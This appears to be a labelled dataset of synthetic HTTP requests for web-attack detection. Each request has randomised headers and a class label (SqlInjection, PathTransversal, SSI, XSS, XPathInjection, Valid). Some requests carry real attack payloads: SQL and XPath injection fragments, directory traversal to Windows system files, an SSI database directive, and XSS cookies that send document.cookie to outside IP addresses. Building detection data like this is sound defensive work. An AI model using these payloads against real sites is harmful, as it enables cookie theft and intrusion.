Via: 0.4 241.209.118.65
Transfer-Encoding: identity
Upgrade: oes/1.8
Warning: 663 165.110.177.57 "Erciaio8spfcatRGun" 
X-Forwarded-For: 26.168.221.221
X-Serial-Number: 891769847073825
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41276
Start - Id: 41508
class: SqlInjection
PUT /nLGS.H4B0gx/TitsniN/et9deagses/tk/tAei.msf? HTTP/1.0
Content-Length: 208
Content-Language: PYe,uii,sytme
Content-Encoding: gzip
Content-Location: /eafidW/uonm0dc/m3iotCd/neodR/iIomal.swf
Content-MD5: OEhpdG1lZGluYkFlbWRpaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Mar 05 21:06:08 UTC
Last-Modified: Sat, 31 Oct 09 23:54:48 CET
Host: www.ercdrhw.fr:3107
Connection: keep-alive
Accept: image/gif;q=0.8
Accept-Charset: x-mac-cyrillic, windows-874
Accept-Encoding: gzip, compress
Accept-Language: *
Cache-Control: max-age=183
Client-ip: 3.29.1.103
Cookie: h0tc=eemmeamf5md;esomlhIg3yleee=np_;dh=neHcPJto
Cookie2: $Version="3"
Date: Wed, 26 May 04 23:17:20 GMT
ETag: "_vMH@4MNLWv9FY-"
Expect: maEbbf
From: pfpr@iosyoa.gov
If-Modified-Since: Wed, 27 Feb 08 18:13:01 GMT
If-Unmodified-Since: Thu, 02 Nov 06 03:55:23 UTC
If-Match: *
If-None-Match: "tDXK4g@6ewVZXcqE"
If-Range: *
Max-Forwards: 431
MIME-Version: 9.8
Pragma: tRtc9iaa='enssm'
Proxy-Authorization: NTLM ZWx3bnJjY25jVGVvbzkzZHRuMWFhbGFydzVhcmVuaHl6YnF2Yw==
Authorization: Basic YWVlVGhob206cmllZXNpMg==
Range: 229-94,-0,-455
Referer: http://www.tldoet4e.org/iarP/vreuss.htm
TE: gzip,chunked
Trailer: User-Agent
User-Agent: Mozilla/9.6 (Machintosh; U; Mac OS X 1.4; in-s9; rv:5.0.5) Gecko/45924150
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
Via: 3.9 www.ng5nlt.tiff, 3ti/0.5 www.xniunjck.shtml, Dsrcq/7.8 www.iemr.html
Transfer-Encoding: deflate
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

emnuoanbnywt7I=296&Aamde=1o&ado= all&ebtrswlt85sprqP=eP6Qy&saAoUOY=q5yotMxd8ie&Y.8xP=raeelaneE&Ontn0E=63984&tysme=00&yoqbtce=34285216&eitbu9shwa='    group  by  users.id     having   11847=11847&e9wssn=ly

End - Id: 41508
Start - Id: 46013
class: PathTransversal
PUT /axhdeeTt/qJgM4bxk@94Xd_a/ehiIc0yAkAbc4LF/7trj2toacsciew/c_e1/npj6/qlOyx2JwxsYKpc/m2ewadrp.asp? HTTP/1.1
Content-Length: 187
Content-Language: k8cet,7rphe,ydnp
Content-Encoding: compress
Content-Location: /n19te/aT1nca2e/03nSryoh.sh
Content-MD5: ZWxUc3QwZ2hnNnJlbmV4YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Feb 04 09:43:01 UTC
Last-Modified: Sat, 19 Apr 08 23:48:02 CET
Host: 185.126.161.90:80
Connection: keep-alive
Accept: audio/x-wav;q=0.5, application/postscript
Accept-Charset: windows-874;q=0.5, windows-1252
Accept-Encoding: identity;q=0.9
Accept-Language: wtli1t-bowu7;q=0.7, r6-1riyaaaa;q=0.8, 2m-edico;q=0.7, Feuf-Udd9;q=0.5, h4ms-ezfzio9;q=0.6
Cache-Control: no-transform
Client-ip: 17.228.75.155
Cookie: enfe7CG1cene=oo-@GkI;af3kfnhukemiEdl=/../../../Inetpub/iissamples/taalic/vegeor/icoltora/retrveer.bin;ahaiEce7hxehe=R3;0)t
Cookie2: $Version="5"
Date: Sun, 28 Sep 08 16:11:01 GMT
ETag: "eO1Ccbc.Nt5b9d2EP3tV"
Expect: nqzigr6
From: S8Hq@esnd8.st
If-Modified-Since: Fri, 16 Jan 09 12:59:05 GMT
If-Unmodified-Since: Mon, 19 Nov 07 23:23:55 UTC
If-Match: *
If-None-Match: "MVAT2N._aMC0UJZYT@"
If-Range: Fri, 18 Jun 04 24:44:59 UTC
Max-Forwards: 12
MIME-Version: 8.1
Proxy-Authorization: NTLM aWllclB0eGFxaWJjbnllbHR0ZTdlNjVkM2VlaTNzdHR1dHRp
Authorization: Digest realm
Referer: http://cpim4.cz/Fh9d.jsp
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.1 (X11; U; Open BSD i586 9.0; rr-eq; rv:8.4.9) Gecko/32857505
UA-Disp: 513,988,16
Via: HTTP/3.3 206.40.141.236, 7.0 www.q8aenZ.jpeg
Transfer-Encoding: roxli; nnstieqx=iptbte
X-Forwarded-For: 150.199.183.225
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

su=818&ernJumnvd=aexzp3erhrndO&psaem=g3S&e03s= hrb&anrhnaumn9eqtms=e(locationet  ametaetc ]&6auhd9ochio=~xml[obodye:s ee33f&xYexecKxdD=5598&NaexUxs=vSYfydwUl0a&CchildBWqnZQ=7085

End - Id: 46013
Start - Id: 40744
class: SSI
GET /@7DF/dCKeEbFa99/1zawuAe4kcaflsoose/tfZhg4/YlsystemiJoB/documentTTdNmOlUHNzphpCe/r7mYUnYBihX85rKKj.jpeg?bG._3dbetween=jejiWwlnrias+&t9o=74511004&laL=s%27%2F6hand&nseLroyi=%3Cre+ytplnaccess_logfwl%3Eed&rfmoab=el+Nd%40gd HTTP/1.1
Host: 165.211.42.55:1
Connection: aestedr
Accept: */*
Accept-Charset: iso-8859-1, windows-1258
Accept-Encoding: identity
Accept-Language: *;q=0.8
Cache-Control: anh7aaoA=eucaoREe
Cookie: dWse=<!--    #odbc statement = "select  tneg,   letst,  xenxt from stzxfr     order   by  6,     58,  9"  -->
Date: Wed, 28 Dec 05 04:46:45 UTC
ETag: W/"xkz@IPcc@XXaeDPAvcNH"
If-Modified-Since: Mon, 31 May 04 16:36:15 UTC
If-Unmodified-Since: Mon, 28 May 07 19:03:10 UTC
If-None-Match: "EqeoGvg8UywwApZhF0lM"
If-Range: Thu, 29 Apr 10 08:52:08 UTC
Max-Forwards: 7521
Pragma: nhrjizF='smmotAE'
Referer: /9meghf/roi9uses/aoPSem/tKwct.pl
User-Agent: ihnimAa (a7.7CcA; ntBcE3; i@5VSG; azWxofJ)
UA-OS: Windows NT
UA-Color: color8
Via: 5.1 www.caHdr7t.css
Transfer-Encoding: compress
Warning: 918 165.10.25.125 "hjreare" 
X-Serial-Number: 0148661754
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40744
Start - Id: 19356
class: Valid
GET /d_6M7hSp2hOV63wVum/8FwgetbdOd.7e@ozG.html? HTTP/1.1
Host: www.H58t.st
Connection: anmue
Accept: */*
Accept-Charset: koi8, iso-8859-4;q=0.9, koi8;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 60.233.136.142
Cookie: s1bgsound712UCTupdate0=cSUC0kU_pd91;5sC=VeAttrrscs;aoac=d2aatigt0du;arrgrksdjtSa=w'lesK :aobm/c
Cookie2: $Version="883"
Date: Sun, 25 Apr 10 10:02:00 UTC
ETag: W/"7Sx2WhrqLQQ@nr1t"
Expect: 100-continue
From: eNaay@rjRtebre.biz
If-Modified-Since: Wed, 04 Nov 09 11:01:27 CET
If-Unmodified-Since: Fri, 29 Dec 06 21:31:32 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 15 Oct 08 07:29:10 UTC
Max-Forwards: 054
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic bmZydGM6ZGVlYQ==
Authorization: NTLM aWRxNFZvbHJuc2F1MmJlc2VlaHRlN2RpdGVldXdDcmVhbm9lbA==
Range: 80-
Referer: http://www.9gzxS.gov/aoaa.js
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/3.8 (Machintosh; U; PPC Mac OS X 4.6; ed-wa; rv:8.6.7) Gecko/85314643
UA-CPU: StrongARM
UA-Disp: 674,7588,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 352x2255
Via: FTP/0.6 66.43.140.206, HTTP/0.2 www.ae3cwzhc.png:7, 1.6 109.79.2.220
Transfer-Encoding: 4zrena; ueedpe=54dtr
Upgrade: ma71z/4.6, eysee/5.2
Warning: 825 www.3Eothdos.gif:29220 "iow9t" 
X-Forwarded-For: 106.216.193.253
X-Serial-Number: 04731684394484360206
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19356
Start - Id: 47839
class: XSS
GET /redqnblOceDrn3o/nM/aRa/2eos18S0cn6l/yEf/gaattmocrus/lsrejvaAewptnNR6gq.jpeg?aseke=nrYWB&nrheceauelojlda=0761&c9nteot3sols=hItht&oot=stae2aemkzbivaH&Qnh3iVbal=%3Cbgsound+++++src++%3D+%22+++javascript%3A+%5Bwindow.open%28%27http%3A%2F%2F130.12.199.0%2Fas.php3%27%2Bdocument.cookie%29%3B%5D+++++%22+++%3E&fy=%3AHiw%7C&v4ID52=9e0tue&vnwroeehtaTehi9=6%3Dt&uwinntc7v1M80zzT=vziS%278ehpo+lete&Niaeedn8r4trea=rzlcOo&moepistnhdosyi=8000763&amnpoodNhFt4Ed=npositionea&zhdt0sl=8738543 HTTP/1.0
Host: 142.43.123.82
Connection: close
Accept: */*;q=0.5
Accept-Charset: isiri-3342, iso-8859-8-i;q=0.5, x-mac-arabic, hz-gb-2312;q=0.5, x-mac-japanese;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.8
Cache-Control: max-age=60608
Client-ip: 145.49.48.15
Cookie: T7-x3qSps=ccCY0tA6;etn6l4i7ACe=4068
Cookie2: $Version="459"
Date: Tue, 01 Sep 09 19:47:17 UTC
ETag: "dhh4oVNZRH_AtKMGN_Ng"
Expect: hnkndi8=thtmdr
From: pMtHteat@h2a4E.de
If-Modified-Since: Mon, 21 Dec 09 18:19:34 CET
If-Unmodified-Since: Sat, 17 Apr 04 11:27:20 GMT
If-None-Match: *
If-Range: "L1pBSGEMNIT-en7_6M"
Max-Forwards: 71
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic aGVlaWVheDoxcmVub2xy
Authorization: Digest nc=6bAD0f35
Referer: /g2ae/niBgw/sSoeqr6/keoe/esufleUM.png
TE: chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.0 (Machintosh; U; Mac OS X 4.7; 5y-ca; rv:0.1.4) Gecko/47402749
Via: 1.0 223.37.90.140, FTP/6.3 228.220.184.73, 1.0 www.eet3.htm
Transfer-Encoding: identity
Upgrade: dse/3.9, erre/3.1, jAtMM/7.7, eexzD/7.4
Warning: 297 www.wzsizre.html:14 "rgdedqieE" "Thu, 23 Dec 04 01:45:46 CET"
X-Serial-Number: 42043067553619454717
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47839
Start - Id: 46740
class: XSS
GET /3gX-5Gn9l@LDAO2xgyg/Fj/OWardi@nYandbetweenbLzphp/edBgwnyDiltNn7Y-/havingKZLseSW-delete1V.msf?iau9ts=+&itonaTirrAu=mrniRyeincludehsghxni&Rcaat=s%26yte&KCXJpdFyU=ic0L&tubdenstDeeg=o0nph3eNasct&dr3lO=b4FDLsr-&wuaewrar=a&iEase=a_yE.&hnEvzsggaaz=r35etegewaChfRQh8r HTTP/1.1
Host: www.iyeelhcaT.de
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: identity, compress, compress;q=0.2, deflate, identity;q=0.4
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 187.192.160.132
Cookie: 5nsjeJLetm=<![CDATA[<!--]]><script    >[window.open('http://54.225.194.236/gemeic.sh'+document.cookie);]//--></script  >
Cookie2: $Version="780"
Date: Fri, 13 Mar 09 14:46:35 GMT
ETag: W/"TW83Vyq71WoHPX8cEG3S"
Expect: rst33=jrae;lnoT=0aErtdie
From: vpiisea@ttsPnero.gov
If-Modified-Since: Tue, 02 Oct 07 09:14:50 GMT
If-Unmodified-Since: Tue, 15 May 07 06:00:24 CET
If-Match: *
If-None-Match: "64r1iraDBfd47OdCZ"
If-Range: Wed, 28 Apr 04 19:09:37 GMT
Max-Forwards: 1
Pragma: oU=infGR
Authorization: tmdEi eoo2oxat=brnnt
Range: 442056-228255
Referer: /nnettacc.pl
TE: trailers,chunked;q=0.8
Trailer: From
User-Agent: s@BlkBHl http://www.fi2id9je.gov
UA-OS: Win98
Via: tfU/2.5 148.1.160.56, 1.0 www.aet3d.js:17
Transfer-Encoding: identity
Upgrade: acef/9.1
Warning: 811 www.etimuquh.jpg "yaitsotn" "Wed, 27 Jun 07 01:22:44 GMT"
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46740
Start - Id: 48435
class: XPathInjection
GET /9oBXGK1_8ljA6t_U/aii5DFjifGMj/ono8biWtoosylitAi7a6/i5H.g@RJKQXVJkkrW/n8CRP1-8GQRctjE/oKts/null.ahtpass.jpg? HTTP/1.1
Host: 156.100.82.159
Connection: close
Accept: text/*, image/png;q=0.9, image/*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ae7e5ert-79m7wecf, eufabn4-me4ir
Cache-Control: max-stale
Client-ip: 2.201.229.218
Cookie: sdioroce=trdi;8ejsuow=Eim6n)Oeow;qeaMsoe=wefu' or     7iaah/t94/child::node()[processing-instruction()=831]     or   'aaa'   =';n7ih=aRb53l.luBQ
Cookie2: $Version="3"
Date: Fri, 30 Nov 07 01:20:44 CET
ETag: W/"1xV4GK7LTXGJbC."
Expect: 100-continue
From: an5t6so@oftn7.de
If-Modified-Since: Sun, 06 Feb 05 01:32:11 GMT
If-Unmodified-Since: Mon, 27 Dec 04 18:49:36 UTC
If-Match: "kH5rhJZipZxaDKC-h4"
If-None-Match: *
If-Range: *
Max-Forwards: 976
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: mduE3 monuocet=sdse9
Authorization: Digest nc=A2Bae15C
Range: 849-343947,4-,-41
Referer: http://dsa1au.org/iaefweeo/Oxiaidc6.sh
TE: chunked,trailers,trailers
Trailer: Range
User-Agent: rc1ie/2.6.7.7.8
UA-CPU: x86
UA-Disp: 1980,9554,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 736x8467
Via: HTTP/2.4 www.nrfhTnE.jpg
Transfer-Encoding: deflate
Upgrade: 7eaeH/4.4
Warning: 365 193.128.98.208 "ats1" 
X-Forwarded-For: 110.20.49.195
X-Serial-Number: 72505509586520475134
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48435
Start - Id: 31090
class: Valid
GET /aRfx9TnRn.i/nMI.YxC5RjMVnwnP1j/nSiyxD-pMbd/h-X_nBbaQkKZgLwsn8D/aDbpeCV@c5@JUjrPfG8T/uauocsibtr8fg6o/jonnnqhnoe/shao.css? HTTP/1.0
Host: 250.181.252.86:80
Connection: close
Accept: */*
Accept-Charset: utf-7;q=0.3, euc-tw, x-mac-turkish, iso-2022-kr;q=0.3
Accept-Encoding: *;q=0.1
Accept-Language: nte-re, 0t0ihao-n3im
Cache-Control: no-transform
Client-ip: 6.188.213.77
Cookie: ou8onnAoc3= ansasidme;Zi53Lodx-rvcmd=jtkdeueU;wdiba8ntb0h=inaRreT;nnEfzoeaot=r$ bodysBwzs : qn;onPsViona=30053048;unl8mgarcasaont='Uojxp_?d texecee
Cookie2: $Version="015"
Date: Thu, 15 Jul 04 13:32:08 CET
ETag: "omCXPrc0YCBdZq.n"
Expect: imamsYsm
From: adoettne@ke1r.ch
If-Modified-Since: Mon, 27 Jun 05 02:06:56 UTC
If-Unmodified-Since: Wed, 20 Oct 04 01:02:57 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 23 Jul 07 03:16:40 CET
Max-Forwards: 0750
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM YWU2N1dlc3NnZHRxcXN0ZWhlZWllR3l0aWRsbHNyZHdoZjJzbm9oaQ==
Authorization: Basic M3N3dXRlOmVHd3R0
Range: -86214,0-5,7241-7
Referer: http://fOhi.org/eIt2mnt/oua66.jsp
TE: gzip,chunked;q=0.8,chunked;q=0.7
Trailer: TE
User-Agent: Mozilla/1.9 (compatible; Konqueror/9.6; Windows NT; aqCm)
UA-CPU: MIPS
UA-Disp: 334,6065,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1573x3760
Via: 1.0 www.eRer.shtml, FTP/9.0 www.ut1i7c.gif, HTTP/3.1 www.rlaAnvo.jpg
Transfer-Encoding: gzip
Upgrade: pOeLoo/5.5, vme/0.8, dnk/2.7
Warning: 301 www.dh1xee3.shtml "oNgpah" "Mon, 27 Nov 06 14:15:58 GMT"
X-Forwarded-For: 80.59.235.174
X-Serial-Number: 30237694505
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 31090
Start - Id: 1203
class: Valid
GET /zdJ31/leIbe/qp0bqgqvoDMVpeMO9Sa/5N9.shtml? HTTP/1.1
Host: 29.105.198.128
Connection: close
Accept: image/*
Accept-Charset: isiri-3342;q=0.8, iso-8859-9;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 236.70.103.177
Cookie: rKSzrz6=srrcpdnNtsgtFd3nyv;2PB4LjRlog=rtowjm 3tbi\ tte-t;derhrw=9;eeFdkspn=440601
Cookie2: $Version="977"
Date: Wed, 31 Mar 10 10:19:08 UTC
ETag: "4G0pm5zalxbPsp_0"
Expect: chdmn=EmWeh
From: stkJu@ixghnIjuI.org
If-Modified-Since: Sat, 13 Feb 10 05:49:24 UTC
If-Unmodified-Since: Mon, 25 Jan 10 20:27:57 CET
If-Match: "sVF2j0G34cod.MAqLn"
If-None-Match: "gL4T9MHPRnS0XHiCx"
If-Range: *
Max-Forwards: 7159
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM bjRvYWhzYWxxcmUwc2VhcHNvTzRvYXhoaHQ4NEFhZFRodWVJaWdsZW9zcw==
Authorization: Basic bG9JcGFpOm1lc25o
Range: 1-60,17-538
Referer: http://www.txse3.com/9thwc/Aewaes6d/aactsA/urtoa.asmx
TE: trailers
Trailer: User-Agent
User-Agent: mmiyecea/9.5.4
UA-CPU: PowerPC
UA-Disp: 3549,296,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6451x169
Via: 1.7 www.d8eo.shtml, FTP/3.7 122.46.38.77:625
Transfer-Encoding: 3tss96
Upgrade: u6r/6.7
Warning: 000 44.117.86.117 "8eny" 
X-Forwarded-For: 161.167.26.165
X-Serial-Number: 6555441060266174
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1203
Start - Id: 11114
class: Valid
GET /baez/ok8F17jbDEISmYBos/isFhomeqO.YyArG.css?a9p65egNoda9l=eul&icyseon0=z98HA&p5OGqEY=aoaLnvue&oqbujdhnlr=uA%2Fwi1x&5o=1477219045 HTTP/1.1
Host: www.lejaRtrdr.net
Connection: keep-alive
Accept: image/png, audio/*;q=0.9, video/*
Accept-Charset: iso-8859-5;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 82.70.144.119
Cookie: lZXK= aWdee53-;bHe1aanny=3R42vxG;reo8q6hht=Ninsertssbpt;locationR27NCQ.Go='
Cookie2: $Version="6"
Date: Sat, 05 Mar 05 04:39:38 GMT
ETag: W/"TQ5hbIr3Gat76ZTq"
Expect: 100-continue
From: lQbqTa@Erdtpio.net
If-Modified-Since: Wed, 06 Jun 07 06:54:00 GMT
If-Unmodified-Since: Fri, 13 Oct 06 24:14:57 UTC
If-Match: *
If-None-Match: "ame0O48uq22u-5atAgWx"
If-Range: "HJtI8BbjvMb3MHy-0q"
Max-Forwards: 7520
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM bmVyRTdhbWtlZ3FpbG5nTGM0aGVzcmVhZW5uZXMycnRjb2xlZWNzbg==
Authorization: tnreqm evaehss=sbrr0
Range: -442015,-0464
Referer: http://www.91utEilE.st/b8dsiqe/aoIN/cttjlO/lzihp/rEhcnb.txt
TE: trailers,chunked
Trailer: TE
User-Agent: TsiufyjMmkodhxrr
UA-CPU: 68000
UA-Disp: 8419,120,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4624x463
Via: asw/4.5 www.eetrhy.jpg, 1.9 www.ohtotmbi.html, 4.7 www.raedeehc.png
Transfer-Encoding: gzip
Upgrade: h9ae/4.8, It0/5.8, p4im/5.6, hur/2.4
Warning: 038 253.37.154.187 "upnl" "Tue, 05 May 09 05:09:44 CET"
X-Forwarded-For: 93.178.246.86
X-Serial-Number: 96723
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11114
Start - Id: 29812
class: Valid
GET /lkzEmtfhvrbcrlye/akotTOntN1.js? HTTP/1.1
Host: www.srer.it
Connection: toeokf
Accept: image/png;q=0.6
Accept-Charset: ks_c_5601-1987, koi8-r;q=0.5, iso-8859-9, x-mac-greek
Accept-Encoding: identity;q=0.1, deflate, gzip;q=0.7, deflate;q=0.9, identity
Accept-Language: hoaeoajo-is
Cache-Control: no-transform
Client-ip: 173.222.100.215
Cookie: crn=Q'n-haro0dservicesernnzlocation ls;eohAunekvis=c.Mb@UM;uy1ooenee1e=mgrxfBStj;elugct=4qosautfi8nh3
Cookie2: $Version="78"
Date: Wed, 03 Aug 05 17:29:36 CET
ETag: W/"qOja.8bmoYJ0.nDl"
Expect: Ffelot
From: 4hgys@hnenh.de
If-Modified-Since: Tue, 03 Mar 09 11:04:45 UTC
If-Unmodified-Since: Thu, 17 Dec 09 02:53:25 UTC
If-Match: "isNg0PnIldJ0FyR3o"
If-None-Match: "@7TF.M24Wsx-Yx."
If-Range: Tue, 01 Feb 05 24:12:24 GMT
Max-Forwards: 1
MIME-Version: 0.0
Pragma: nynkwd=ee
Proxy-Authorization: al17t nuoirww=cirn
Authorization: Basic cnVjQ2l1bDpzdTJzeWlv
Range: 2-,-34748,32-787788
Referer: http://www.sn2s.net/ebbaeeoe/i1easnku.zip
TE: trailers,gzip;q=0.2
Trailer: If-Match
User-Agent: Mozilla/0.5 (X11; U; Linux i386 3.6; ax-7i; rv:2.4.9) Gecko/91830324
UA-CPU: 68000
UA-Disp: 793,154,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 231x322
Via: 4.6 221.106.111.79:000, 3.0 116.227.154.126:0, 2.3 154.169.92.44:95882
Transfer-Encoding: deflate
Upgrade: hoc/9.0, nsaeuh/2.0
Warning: 826 120.244.114.62 "ohmrlhttoebnciv" "Thu, 08 Sep 05 16:28:14 UTC"
X-Forwarded-For: 22.79.136.228
X-Serial-Number: 32706880083350611
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29812
Start - Id: 45970
class: PathTransversal
POST /iJLw1/toqiutynecnmfio/nM/aeuNdpd/euoofhTsiLt/n1EDu/ont8iuNco/advnhre0m7ska/tq6brMyi0rnskYrehi/6vXGosdy4nO3pkx5/w2GFHLkFHYPndK.jsp? HTTP/1.1
Content-Length: 329
Content-Language: 9o7,e0tEgh,nxc
Content-Encoding: deflate
Content-MD5: bkFjZTlxbWllcHRVZWU1ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Aug 06 11:03:02 GMT
Host: 10.180.191.200
Connection: Ehumk1
Accept: text/*;q=0.6, image/*, application/*
Accept-Charset: *
Accept-Language: ..\..\..\..\WINNT\system.ini
Cookie2: $Version="661"
Date: Mon, 23 Jun 08 03:17:51 CET
ETag: W/"I6Z0ysyfi9upk5OXhCH"
Expect: 100-continue
If-Match: *
If-None-Match: "IhIb-pDGoLKTLUfx"
Max-Forwards: 5
Authorization: Digest qop=auth
Referer: http://www.moUeea67.biz/eLsS/sxrz/Lnir.exe
User-Agent: Mozilla/5.2 (X11; U; Linux i586 1.3; aw-ki; rv:4.8.8) Gecko/31511613
UA-CPU: StrongARM
Via: 4.5 242.67.133.32, 1llke/7.2 68.100.138.184, oc4rd/2.1 148.119.18.125:8
Transfer-Encoding: gzip
Upgrade: fsoe/9.8, uwtd/5.6, pcsCta/5.2
----: ------------------

migbanosoaroan=oceRlMnoeofoSetOev&rbmoihnhyd=clrmrexecudco&scRhlesEvhiel=64166015&yihSi=dsl9$@riexectyo=h&Um=irth7mnhiframe&1ee26sh=f4osnrts4&wfVSphYDExml0Q=62429&ds=xbe&amhaFssmeb1me9o=arqOrri(dmshacha9o&3tosadPrsvtugee=isermknn5gudb&h9Ii=aewy&mifNnfrEzR=haisA vat&Treplace@wrHP=r0h1eIiatrottTKchk&oaedfktrPz=we'ecHaea

End - Id: 45970
Start - Id: 34713
class: Valid
POST /2xUolsewessesefonrw/aRMJ41/oSe/drnOiaodp/1zsTemcto6sqn4lcdor/yqidanihcteb/RhuLinserthXgJX-J.html? HTTP/1.1
Content-Length: 212
Content-Language: esoirS
Content-Encoding: compress
Content-Location: http://www.iunoaovn.de/ell3C4th.mpg
Content-MD5: aXBuc3RzaXVjcnJpaGVsaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 07 Sep 07 23:04:25 UTC
Last-Modified: Fri, 16 Oct 09 16:54:47 UTC
Host: 144.180.42.233
Connection: kooe9
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: tegeKhiN-z4dtqnl, ovfpduf-hdrtorfs;q=0.8, chzeneh-xnolo8re
Cache-Control: min-fresh=1983
Client-ip: 51.127.174.180
Cookie: ZbG9qhbdnetcatVmi=asylconnect;25nrce4=uziy6t0eness
Cookie2: $Version="0"
Date: Thu, 11 May 06 16:33:26 UTC
ETag: "8erC9-_O9RtNYMN8"
Expect: 100-continue
From: eegGaa@nxna0n.uk
If-Modified-Since: Sat, 14 Oct 06 22:09:30 GMT
If-Unmodified-Since: Wed, 24 Nov 04 01:00:37 UTC
If-Match: "d2R6@fMZh2GQv7oUis"
If-None-Match: "pd2lnoqdJQkYOfej7q"
If-Range: Wed, 27 Apr 05 17:58:52 UTC
Max-Forwards: 8
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: oMaee6 eudjami=nlnieitl
Range: 27601-82680,576792-311040,-975285
Referer: http://Oowlptq.uk/iRElsebx/76evV6te/kaIfleec/Hwnn/atzo.cfm
TE: gzip;q=0.6,gzip;q=0.9
Trailer: Cache-Control
User-Agent: Mozilla/2.7 (Machintosh; U; PPC 5.1; tj-t4; rv:5.1.7) Gecko/40134869
UA-CPU: x86
UA-Disp: 659,9099,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 420x8395
Via: FTP/1.3 www.nsnciaww.tiff, oioi8/2.7 83.236.182.171:1
Transfer-Encoding: compress
Upgrade: nq8o/9.4, hsea/1.7
Warning: 270 www.akhXhs.js "ogdA" "Wed, 23 Dec 09 01:56:59 UTC"
X-Forwarded-For: 102.210.121.17
X-Serial-Number: 70295990861852353496
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

phheeTne4=3473565&mnEdtanon=oe&eceyoye69aisu=8l&pfvGSFN0=7e6el&bi2sTahyc31t6tp=b&oeeaEt=]ic&eya8ktkt7=15&isptt=sJPKPpq8lAt&3virtlstr6=cLe5nbi&ntefrzsgptdeho=2958520&sz6tEdi6ox7S6sw=1&TRvnph-=10&xOrnsre=ssvtIrkZ

End - Id: 34713
Start - Id: 19738
class: Valid
GET /sfrNelaPaacicTo/psJry/t4w4/sm-6Vc71M-1Pte_d4Ve1/1FQaW/bm/gBqsDC84wg9/el/hIotIqiG/lmethrAVt4ttve76eate/1Ywget69ls861optupdateQI/xF7MtpdZiK.php? HTTP/1.1
Host: www.adynsmt3l.de
Connection: close
Accept: */*;q=0.5
Accept-Charset: euc-tw;q=0.8, windows-1250, windows-1258, iso-8859-8-i
Accept-Encoding: *;q=0.5
Accept-Language: tremoite-htaynao
Cache-Control: E='ng'
Client-ip: 207.179.57.163
Cookie: 0catxA=7]>;rautH=59740;rEe=Jhaving
Cookie2: $Version="14"
Date: Wed, 20 Aug 08 13:36:48 CET
ETag: "MpA374tHGJvwNKPP"
Expect: Ewse
From: iuIqi35@sebqclrtn.be
If-Modified-Since: Mon, 17 Oct 05 02:35:36 GMT
If-Unmodified-Since: Thu, 11 Feb 10 13:13:19 GMT
If-Match: "sp8U@MuChLi3ZmWy@6"
If-None-Match: *
If-Range: *
Max-Forwards: 064
MIME-Version: 8.6
Pragma: e=rTi
Proxy-Authorization: NTLM bHRIaXRocnN1YTZpczlEc2FpZWlhOW5hOXROdmNQb250cmhp
Authorization: NTLM dTR3ZW9yenBpZ2FhZWFscmlybXBtNmFNbGVydWFvaG9tdmFzN3I=
Range: 4774-
Referer: /UreWsie/ohnutda/5irnwayt/esewIss.bin
TE: trailers,chunked,trailers
Trailer: Max-Forwards
